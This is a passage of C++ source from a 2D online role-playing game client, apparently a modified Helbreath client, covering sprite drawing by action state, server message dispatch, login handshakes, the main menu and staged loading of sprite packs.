		_tmp_sAppr1     = sFocusAppr1;
		_tmp_sAppr2     = sFocusAppr2;
		_tmp_sAppr3     = sFocusAppr3;
		_tmp_sAppr4     = sFocusAppr4;
		_tmp_iApprColor = iFocusApprColor; // v1.4
		_tmp_iStatus    = iFocuiStatus;
		strcpy(_tmp_cName, cFocusName);
		_tmp_dX = sFocus_dX; // v2.171
		_tmp_dY = sFocus_dY; // v2.171

		if ( (_tmp_cAction != DEF_OBJECTDEAD) && (_tmp_cFrame < 0) ) return;
		switch (_tmp_cAction) {
		case DEF_OBJECTSTOP:
			DrawObject_OnStop(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;
		case DEF_OBJECTMOVE:
			switch (_tmp_sOwnerType) {
			case 1:
			case 2:
			case 3: // Human M
			case 4:
			case 5:
			case 6: // Human F

			case 28: // Troll.
			case 29: // Ogre
			case 30: // Liche
			case 31: // DD
			case 32: // Uni
			case 33: // WW
			case 43: // LWB
			case 44: // GHK
			case 45: // GHKABS
			case 46: // TK
			case 47: // BG
			case 48: // SK
			case 49: // HC
			case 50: // TW
			case 51: // CP
			case 52: // GG
			case 53: // BB
			case 54: // DE
			case 55: // Rabbit
			case 56: // Cat
			case 57: // Frog
			case 58: // MG
			case 59: // Ettin
			case 60: // Plant
			case 61: // Rudolph
			case 62: // DireBoar
			case 63: // Frost
			case 65: // Ice-Golem
			case 66: // Wyvern
			case 70: // Dragon..........Ajouts par Snoopy
			case 71: // Centaur
			case 72: // ClawTurtle
			case 73: // FireWyvern
			case 74: // GiantCrayfish
			case 75: // Gi Lizard
			case 76: // Gi Tree
			case 77: // Master Orc
			case 78: // Minaus
			case 79: // Nizie
			case 80: // Tentocle
			case 81: // Abaddon
			case 82: // Sorceress
			case 83: // ATK
			case 84: // MasterElf
			case 85: // DSK
			case 86: // HBT
			case 87: // CT
			case 88: // Barbarian
			case 89: // AGC
			case 91: // Gate		
				break;

			default: // 10..27
				_tmp_cFrame = _tmp_cFrame * 2; //
				break;
			}

			DrawObject_OnMove(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTDAMAGEMOVE:
			DrawObject_OnDamageMove(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTRUN:
			DrawObject_OnRun(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTATTACK:
			DrawObject_OnAttack(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTATTACKMOVE:
			DrawObject_OnAttackMove(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTMAGIC:
			DrawObject_OnMagic(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTDAMAGE:
			DrawObject_OnDamage(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTDYING: //10
			DrawObject_OnDying(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;

		case DEF_OBJECTDEAD: //101
			DrawObject_OnDead(m_sMCX, m_sMCY, sFocusX, sFocusY, TRUE, dwTime, msX, msY);
			break;
	}	}

	if (m_bIsGetPointingMode == TRUE)
	{	if ( (m_iPointCommandType >= 100) && (m_iPointCommandType < 200) ) // spell
		{	if (m_bCommandAvailable == TRUE)
			{	if( m_sMCX != NULL )
				{	if( _iGetFOE(iFocuiStatus) < 0 )
						m_stMCursor.sCursorFrame = 5;   // Red enemi for spell
					else m_stMCursor.sCursorFrame = 4;  // Blue friend for spell
				}else m_stMCursor.sCursorFrame = 4;     // Blue friend for spell
			}else m_stMCursor.sCursorFrame = 8;
		}else if ( (m_iPointCommandType >= 0) && (m_iPointCommandType < 50) ) // item
		{	m_stMCursor.sCursorFrame = 10;				// hand to grap item
	}	}
}


void CGame::GameRecvMsgHandler(DWORD dwMsgSize, char * pData)
{ DWORD * dwpMsgID;
  char * cp;
  DWORD * dwp, dwTimeSent, dwTimeRcv;
	dwpMsgID = (DWORD *)(pData + DEF_INDEX4_MSGID);
	switch (*dwpMsgID) {

	case MSGID_RESPONSE_PING:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
        dwp = (DWORD *)cp;
        dwTimeSent = *dwp;
        dwTimeRcv = timeGetTime();
        m_iPing = (dwTimeRcv - dwTimeSent)/2;
        break;

	case MSGID_REQUEST_ONLINE:
		ResponseOnlines(pData);
		break;

	case MSGID_RESPONSE_CHARGED_TELEPORT:
		ResponseChargedTeleport(pData);
		break;

	case MSGID_RESPONSE_TELEPORT_LIST:
		ResponseTeleportList(pData);
		break;

	case MSGID_RESPONSE_HELDENIAN_TP_LIST: // Snoopy Heldenian TP
		ResponseHeldenianTeleportList(pData);
		break;

	case MSGID_RESPONSE_NOTICEMENT:
		NoticementHandler(pData);
		break;

	case MSGID_DYNAMICOBJECT:
		DynamicObjectHandler(pData);
		break;

	case MSGID_RESPONSE_INITPLAYER:
		InitPlayerResponseHandler(pData);
		break;

	case MSGID_RESPONSE_INITDATA:
		InitDataResponseHandler(pData);
		break;

	case MSGID_RESPONSE_MOTION:
		MotionResponseHandler(pData);
		break;

	case MSGID_EVENT_COMMON:
		CommonEventHandler(pData);
		break;

	case MSGID_EVENT_MOTION:
		MotionEventHandler(pData);
		break;

	case MSGID_EVENT_LOG:
		LogEventHandler(pData);
		break;

	case MSGID_COMMAND_CHATMSG:
		ChatMsgHandler(pData);
		break;

	case MSGID_PLAYERITEMLISTCONTENTS:
		InitItemList(pData);
		break;

	case MSGID_NOTIFY:
		NotifyMsgHandler(pData);
		break;

	case MSGID_RESPONSE_CREATENEWGUILD:
		CreateNewGuildResponseHandler(pData);
		break;

	case MSGID_RESPONSE_DISBANDGUILD:
		DisbandGuildResponseHandler(pData);
		break;

	case MSGID_PLAYERCHARACTERCONTENTS:
		InitPlayerCharacteristics(pData);
		break;

	case MSGID_RESPONSE_CIVILRIGHT:
		CivilRightAdmissionHandler(pData);
		break;

	case MSGID_RESPONSE_RETRIEVEITEM:
		RetrieveItemHandler(pData);
		break;

	case MSGID_RESPONSE_PANNING:
		ResponsePanningHandler(pData);
		break;

	case MSGID_RESPONSE_FIGHTZONE_RESERVE:
		ReserveFightzoneResponseHandler(pData);
		break;
	}
}


void CGame::ConnectionEstablishHandler(char cWhere)
{
	ChangeGameMode(DEF_GAMEMODE_ONWAITINGRESPONSE);

	switch (cWhere) {
	case DEF_SERVERTYPE_GAME:
		bSendCommand(MSGID_REQUEST_INITPLAYER, NULL, NULL, NULL, NULL, NULL, NULL);
		break;

	case DEF_SERVERTYPE_LOG:
		switch (m_dwConnectMode) {
		case MSGID_REQUEST_LOGIN:
			bSendCommand(MSGID_REQUEST_LOGIN, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_CREATENEWACCOUNT:
			bSendCommand(MSGID_REQUEST_CREATENEWACCOUNT, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_CREATENEWCHARACTER:
			bSendCommand(MSGID_REQUEST_CREATENEWCHARACTER, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_ENTERGAME:
			bSendCommand(MSGID_REQUEST_ENTERGAME, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_DELETECHARACTER:
			bSendCommand(MSGID_REQUEST_DELETECHARACTER, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_CHANGEPASSWORD:
			bSendCommand(MSGID_REQUEST_CHANGEPASSWORD, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		case MSGID_REQUEST_INPUTKEYCODE:
			bSendCommand(MSGID_REQUEST_INPUTKEYCODE, NULL, NULL, NULL, NULL, NULL, NULL);
			break;
		}
		break;
	}
}

void CGame::InitPlayerResponseHandler(char * pData)
{WORD * wp;
	wp = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	switch (*wp) {
	case DEF_MSGTYPE_CONFIRM:
		bSendCommand(MSGID_REQUEST_INITDATA, NULL, NULL, NULL, NULL, NULL, NULL);
		ChangeGameMode(DEF_GAMEMODE_ONWAITINGINITDATA);
		break;

	case DEF_MSGTYPE_REJECT:
		ChangeGameMode(DEF_GAMEMODE_ONLOGRESMSG);
		ZeroMemory(m_cMsg, sizeof(m_cMsg));
		strcpy(m_cMsg, "3J");
		break;
	}
}

void CGame::UpdateScreen_OnMainMenu()
{ short msX, msY, msZ;
 char cLB, cRB, cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 DWORD dwTime = G_dwGlobalTime;

 m_iItemDropCnt = 0;
 m_bItemDrop = FALSE;

    if (m_cGameModeCount == 0)
    {    if (G_pCalcSocket != NULL)
        {    delete G_pCalcSocket;
            G_pCalcSocket = NULL;
        }
        if ( m_pSprite[DEF_SPRID_INTERFACE_ND_LOADING] != NULL )
        {    delete m_pSprite[DEF_SPRID_INTERFACE_ND_LOADING];
            m_pSprite[DEF_SPRID_INTERFACE_ND_LOADING] = NULL;
        }
        EndInputString();
        pMI = new class CMouseInterface;

        // CLEROTH - INTERFACE
#ifdef RES_HIGH
        pMI->AddRect(384 + 97,177 + 42,548 + 135,198 + 42);
        pMI->AddRect(384 + 97,215 + 52,548 + 135,236 + 52);
        pMI->AddRect(384 + 97,254 + 60,548 + 135,275 + 60);
#else
		pMI->AddRect(384, 177, 548, 198);
		pMI->AddRect(384, 215, 548, 236);
		pMI->AddRect(384, 254, 548, 275);
#endif
		m_DInput.m_sX = 400;
        m_DInput.m_sY = 300;

        m_cCurFocus = 1;
        m_cMaxFocus = 5;

        m_bEnterPressed = FALSE;
        m_cArrowPressed = 0;
    }
    m_cGameModeCount++;
    if (m_cGameModeCount > 100) m_cGameModeCount = 100;

    m_DDraw.ClearBackB4();

    DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_MAINMENU, -1, -1, 0, TRUE);

    // CLEROTH
    m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);

	if ((msX >= 384 + 97) && (msY >= 177 + 42) && (msX <= 548 + 135) && (msY <= 198 + 42)) m_cCurFocus = 1;
	if ((msX >= 384 + 97) && (msY >= 215 + 52) && (msX <= 548 + 135) && (msY <= 236 + 52)) m_cCurFocus = 2;
	if ((msX >= 384 + 97) && (msY >= 254 + 60) && (msX <= 548 + 135) && (msY <= 275 + 60)) m_cCurFocus = 3;

    switch (m_cCurFocus) 
	{

    case 1:
        m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->PutSpriteFast(384 + 97, 177 + 42, 1, dwTime);
        break;
    case 2:
        m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->PutSpriteFast(384 + 97, 215 + 52, 2, dwTime);
        break;

    case 3:
        m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU]->PutSpriteFast(384 + 97, 254 + 60, 3, dwTime);
        break;
 
    }

    m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
    
    if (m_cArrowPressed != 0) {
           switch (m_cArrowPressed) {
        case 1:
            m_cCurFocus--;
            if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
            break;
        case 5:
            m_cCurFocus++;
            if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
            break;
        }
        m_cArrowPressed = 0;
    }

    if (m_bEnterPressed == TRUE) {
        // Enter
        PlaySound('E', 14, 5);
        m_bEnterPressed = FALSE;
        switch (m_cCurFocus) {
        case 1:
            delete pMI;
            ChangeGameMode(DEF_GAMEMODE_ONSELECTSERVER);
            return;
        case 2:
    
            ClearContents_OnSelectCharacter();
            delete pMI;
            ChangeGameMode(DEF_GAMEMODE_ONCREATENEWACCOUNT);
    
            return;
        case 3:
            delete pMI;
            ChangeGameMode(DEF_GAMEMODE_ONQUIT);
            return;
        }
    }

    DrawVersion(TRUE);

    iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
    if (cMIresult == DEF_MIRESULT_CLICK) {
        PlaySound('E', 14, 5);
        m_cCurFocus = iMIbuttonNum;
        switch (iMIbuttonNum)
        {
        case 1:
            ChangeGameMode(DEF_GAMEMODE_ONSELECTSERVER);
            delete pMI;
            break;

        case 2:
    
            ClearContents_OnSelectCharacter();
            delete pMI;
            ChangeGameMode(DEF_GAMEMODE_ONCREATENEWACCOUNT);
    
            return;
        case 3:
            delete pMI;
            ChangeGameMode(DEF_GAMEMODE_ONQUIT);
            return;
        
        }
    }

    if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::MakeSprite( char* FileName, short sStart, short sCount, bool bAlphaEffect )
{int iTotalimage;
 DWORD nCount;
 char PathName[28];
	wsprintf( PathName, "sprites\\%s.pak", FileName );
	HANDLE m_hPakFile = CreateFile(PathName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if( m_hPakFile == INVALID_HANDLE_VALUE ) return;
	SetFilePointer(m_hPakFile, 20, NULL, FILE_BEGIN);
	ReadFile(m_hPakFile, (char *)&iTotalimage, 4, &nCount, NULL);
	for( short i=0 ; i < sCount ; i++ )
	{	if( i < iTotalimage ) m_pSprite[i+sStart] = new class CSprite(m_hPakFile, &m_DDraw, FileName, i, bAlphaEffect);
	}
	CloseHandle(m_hPakFile);
}

void CGame::MakeTileSpr( char* FileName, short sStart, short sCount, bool bAlphaEffect )
{int iTotalimage;
 DWORD nCount;
 char PathName[28];
	wsprintf( PathName, "sprites\\%s.pak", FileName );
	HANDLE m_hPakFile = CreateFile(PathName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if( m_hPakFile == INVALID_HANDLE_VALUE ) return;
	SetFilePointer(m_hPakFile, 20, NULL, FILE_BEGIN);
	ReadFile(m_hPakFile, (char *)&iTotalimage, 4, &nCount, NULL);
	for( short i=0 ; i < sCount ; i++ )
	{	if( i < iTotalimage ) m_pTileSpr[i+sStart] = new class CSprite(m_hPakFile, &m_DDraw, FileName, i, bAlphaEffect);
	}
	CloseHandle(m_hPakFile);
}

void CGame::MakeEffectSpr( char* FileName, short sStart, short sCount, bool bAlphaEffect )
{int iTotalimage;
 DWORD nCount;
 char PathName[28];
	wsprintf( PathName, "sprites\\%s.pak", FileName );
	HANDLE m_hPakFile = CreateFile(PathName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if( m_hPakFile == INVALID_HANDLE_VALUE ) return;
	SetFilePointer(m_hPakFile, 20, NULL, FILE_BEGIN);
	ReadFile(m_hPakFile, (char *)&iTotalimage, 4, &nCount, NULL);
	for( short i=0 ; i < sCount ; i++ )
	{	if( i < iTotalimage ) m_pEffectSpr[i+sStart] = new class CSprite(m_hPakFile, &m_DDraw, FileName, i, bAlphaEffect);
	}
	CloseHandle(m_hPakFile);
}

void CGame::UpdateScreen_OnLoading(bool bActive)
{
	int i;
	if( bActive ) UpdateScreen_OnLoading_Progress();

	switch( m_cLoading ) {
	case 0:
		{	m_hPakFile = CreateFile("sprites\\interface.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_MOUSECURSOR] = new class CSprite(m_hPakFile, &m_DDraw, "interface", 0, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS] = new class CSprite(m_hPakFile, &m_DDraw, "interface", 1, FALSE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\Newmaps.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS1] = new class CSprite(m_hPakFile, &m_DDraw, "Newmaps", 0, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS2] = new class CSprite(m_hPakFile, &m_DDraw, "Newmaps", 1, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS3] = new class CSprite(m_hPakFile, &m_DDraw, "Newmaps", 2, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS4] = new class CSprite(m_hPakFile, &m_DDraw, "Newmaps", 3, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS5] = new class CSprite(m_hPakFile, &m_DDraw, "Newmaps", 4, FALSE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\LoginDialog.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) 
			{
				m_pSprite[DEF_SPRID_INTERFACE_ND_LOGIN] = new class CSprite(m_hPakFile, &m_DDraw, "LoginDialog", 0, FALSE);

				m_pSprite[DEF_SPRID_INTERFACE_ND_NEWACCOUNT] = new class CSprite(m_hPakFile, &m_DDraw, "LoginDialog", 1, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_AGREEMENT] = new class CSprite(m_hPakFile, &m_DDraw, "LoginDialog", 2, FALSE);

				CloseHandle(m_hPakFile);
			}

			// CLEROTH - ACC - Snoopy: fixed to use without special pak
			m_hPakFile = CreateFile("sprites\\CreateNewAcc.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_ND_NEWACCOUNT] = new class CSprite(m_hPakFile, &m_DDraw, "CreateNewAcc", 0, FALSE);
				CloseHandle(m_hPakFile);
			}else
			{	m_hPakFile = CreateFile("sprites\\New-Dialog.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
				m_pSprite[DEF_SPRID_INTERFACE_ND_NEWACCOUNT] = new class CSprite(m_hPakFile, &m_DDraw, "New-Dialog", 2, FALSE);
				CloseHandle(m_hPakFile);
			}


			m_hPakFile = CreateFile("sprites\\New-Dialog.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_ND_MAINMENU] = new class CSprite(m_hPakFile, &m_DDraw, "New-Dialog", 1, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_QUIT] = new class CSprite(m_hPakFile, &m_DDraw, "New-Dialog", 2, FALSE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\GameDialog.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_ND_GAME1] =      new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 0, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_GAME2] =      new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 1, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_GAME3] =      new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 2, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_GAME4] =      new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 3, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_CRUSADE] =    new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 4, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL] = new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 6, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_INVENTORY] =  new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 7, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_SELECTCHAR] = new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 8, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_NEWCHAR] =    new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 9, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_NEWEXCHANGE] = new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 10, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_ICONPANNEL2] = new class CSprite(m_hPakFile, &m_DDraw, "GameDialog", 11, FALSE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\PartySprite.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_ND_PARTYSTATUS] = new class CSprite(m_hPakFile, &m_DDraw, "PartySprite", 0, FALSE);
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\DialogText.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_INTERFACE_ND_TEXT] = new class CSprite(m_hPakFile, &m_DDraw, "DialogText", 0, FALSE);
				m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON] = new class CSprite(m_hPakFile, &m_DDraw, "DialogText", 1, FALSE);
				CloseHandle(m_hPakFile);
			}

			MakeSprite( "Telescope", DEF_SPRID_INTERFACE_GUIDEMAP    , 32, FALSE);	  // Snoopy: 20->32
			MakeSprite( "Telescope2", DEF_SPRID_INTERFACE_GUIDEMAP+35, 4 , FALSE); // Snoopy: Ajout.351 (heldenian maps)
			MakeSprite( "monster", DEF_SPRID_INTERFACE_MONSTER, 1, FALSE);
			m_cLoading = 4;
		}
		break;
	case 4:
		{	MakeTileSpr( "maptiles1", 0, 32, TRUE);
			m_hPakFile = CreateFile("sprites\\structures1.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL); //Ⱦ Ÿ ε Ѵ.2002.09.06
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pTileSpr[1 + 50] = new class CSprite(m_hPakFile, &m_DDraw, "structures1",  1, TRUE);
				m_pTileSpr[5 + 50] = new class CSprite(m_hPakFile, &m_DDraw, "structures1",  5, TRUE);
				CloseHandle(m_hPakFile);
			}
			MakeTileSpr( "Sinside1", 70, 27, FALSE);
			MakeTileSpr( "Trees1", 100, 46, TRUE);
			MakeTileSpr( "TreeShadows", 150, 46, TRUE);
			MakeTileSpr( "objects1", 200, 10, TRUE); // snoopy: 8->10
			MakeTileSpr( "objects2", 211, 5, TRUE);
			MakeTileSpr( "objects3", 216, 4, TRUE);
			MakeTileSpr( "objects4", 220, 2, TRUE); //snoopy: 1->2
			m_cLoading = 8;
		}
		break;
	case 8:
		{	MakeTileSpr( "Tile223-225", 223, 3, TRUE);
			MakeTileSpr( "Tile226-229", 226, 4, TRUE);
			MakeTileSpr( "objects5", 230, 9, TRUE);	// Snoopy
			MakeTileSpr( "objects6", 238, 4, TRUE);	// Snoopy
			MakeTileSpr( "objects7", 242, 7, TRUE);	// Snoopy
			MakeTileSpr( "maptiles2", 300, 15, TRUE);//- Index 300
			MakeTileSpr( "maptiles4", 320, 10, TRUE);
			MakeTileSpr( "maptiles5", 330, 19, TRUE);
			MakeTileSpr( "maptiles6", 349, 4, TRUE);
			MakeTileSpr( "maptiles353-361", 353, 9, TRUE);
			MakeTileSpr( "Tile363-366", 363, 4, TRUE);
			MakeTileSpr( "Tile367-367", 367, 1, TRUE); // Add by Snoopy (fountains)
			MakeTileSpr( "Tile370-381", 370, 12, TRUE);// Tile370~381
			MakeTileSpr( "Tile382-387", 382, 6, TRUE);
			MakeTileSpr( "Tile388-402", 388, 15, TRUE);
			m_cLoading = 12;
		}
		break;
	case 12:
		{
			MakeTileSpr( "Tile403-405", 403, 3, TRUE);
			MakeTileSpr( "Tile406-421", 406, 16, TRUE);
			MakeTileSpr( "Tile422-429", 422, 8, TRUE);
			MakeTileSpr( "Tile430-443", 430, 14, TRUE);
			MakeTileSpr( "Tile444-444", 444, 1, TRUE);
			MakeTileSpr( "Tile445-461",	445, 17, TRUE);
			MakeTileSpr( "Tile462-473",	462, 12, TRUE);	// Diuuude
			MakeTileSpr( "Tile474-478",	474, 5, TRUE);	// Diuuude
			MakeTileSpr( "Tile479-488",	479, 10, TRUE);	// Diuuude
			MakeTileSpr( "Tile489-522",	489, 34, TRUE);	// Diuuude Drunken City
			MakeTileSpr( "Tile523-530",	523, 8, TRUE);	// Diuuude Rampart
			MakeTileSpr( "Tile531-540",	531, 10, TRUE);	// Diuuude GodH + Pont
			MakeTileSpr( "Tile541-545",	541, 5, TRUE);	// Diuuude GodH

			// DEF_SPRID_ITEMPACK_PIVOTPOINT+0
			MakeSprite( "item-pack", DEF_SPRID_ITEMPACK_PIVOTPOINT+1, 27, FALSE);
			m_hPakFile = CreateFile("sprites\\item-pack.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT+20] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 17, FALSE); //
				m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT+21] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 18, FALSE); //
				m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT+22] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 19, FALSE); // Angels
				CloseHandle(m_hPakFile);
			}

			// DEF_SPRID_ITEMGROUND_PIVOTPOINT+1
			MakeSprite( "item-ground", DEF_SPRID_ITEMGROUND_PIVOTPOINT+1, 19, FALSE);
			m_hPakFile = CreateFile("sprites\\item-ground.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+20] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 17, FALSE);
				m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+21] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 18, FALSE);
				m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+22] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 19, FALSE);//Angels
				CloseHandle(m_hPakFile);
			}
			MakeSprite( "item-dynamic", DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT, 3, FALSE);// Snoopy 2-> 3 (flags)
			m_cLoading = 16;
		}
		break;
	case 16:
		{
			m_hPakFile = CreateFile("sprites\\item-equipM.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 0] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 0, FALSE);	// body
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 1] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 1, FALSE);	// 1-swords
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 2] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 2, FALSE);	// 2-bows
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 3] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 3, FALSE);	// 3-shields
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 4] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 4, FALSE);	// 4-tunics
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 5] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 5, FALSE);	// 5-shoes
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 7] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 6, FALSE);	// 6-berk
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 8] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 7, FALSE);	// 7-hoses
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 9] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 8, FALSE);	// 8-bodyarmor
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 15] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 11, FALSE); // Axe hammer
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 17] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 12, FALSE); // Wands
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 18] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 9, FALSE);  // hair
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 19] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 10, FALSE); // undies
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 20] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 13, FALSE); // capes
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 21] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipM", 14, FALSE); // helm
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\item-pack.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
